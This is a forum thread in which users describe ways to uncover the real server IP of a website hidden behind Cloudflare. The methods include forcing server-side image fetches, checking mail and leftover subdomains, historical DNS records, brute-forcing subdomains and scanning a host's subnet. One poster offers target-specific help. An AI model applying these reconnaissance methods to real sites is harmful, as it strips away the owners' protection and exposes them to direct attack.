hotpockets Posted May 28, 2016 Posted May 28, 2016 Hey, I was wondering if anyone here knew how to get passed cloudflare? I'm aware you can just get the original main IP, but that thing is hidden away. Even when trying to bypass it using subdomains.
A200K Posted May 29, 2016 Posted May 29, 2016 Depending on what software the server is running, there could be exploits, e.g. if they got some forum software where you can set your avatar by url, the server will connect to it and it could reveal the actual server ip. If they got a https image proxy, post an image, the server will crawl it as well. I saw a lot people who fail to setup cf properly, so you can still get the IP with a mail / other subdomain dns entry, but i guess this wont be the case here, like you said
hotpockets Posted May 29, 2016 Author Posted May 29, 2016 Some people make it sound so easy. They brag about being able to bypass the cloudflare and accessing the main server with ease.
A200K Posted May 29, 2016 Posted May 29, 2016 4 hours ago, evo85 said: Some people make it sound so easy. They brag about being able to bypass the cloudflare and accessing the main server with ease. I wasn't bragging, I just told you the methods you COULD do to obtain the real server ip. If you would provide us the site URL i could tell you what you could do there, as it really depends on the target, what software it is running, how it is configured etc.
hotpockets Posted May 29, 2016 Author Posted May 29, 2016 Ah, I was not refering to you at all. I was talking about other members/social media when I would google this topic.
cynent Posted June 12, 2016 Posted June 12, 2016 A few main ways I do it: direct.site.com - this used to by default go to the original IP, many people forgot to remove it, cloudflare eventually caught onto this and change it, but if it's a site that's been using CF for a while they might still have this problem. Try looking for the mail server, dig site.com mx Check for non-plain-HTTP services like game servers, websocket servers, video or audio streams, etc, and see if any of those IPs work Look for external grabbers, things that will download images from your own server for example Figure out what provider they use, if they mention it somewhere, then blast their whole provider's subnet scanning until you find their webpage showing up when you send their host header - this won't work if the admins actually configure to only allow CF IPs but many don't bother Check if the site is on CloudFlare Watch and check for historical IPs on domaintools, etc if all else fails, there are several tools available which can be used to bruteforce DNS to find hidden subdomains, which might often reveal an original IP 2
Akalanka Posted March 29, 2018 Posted March 29, 2018 https://medium.com/secure-hacker/bypass-cloudflare-protection-get-subdomains-ofa-website-2cb1d749c510 Try it
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now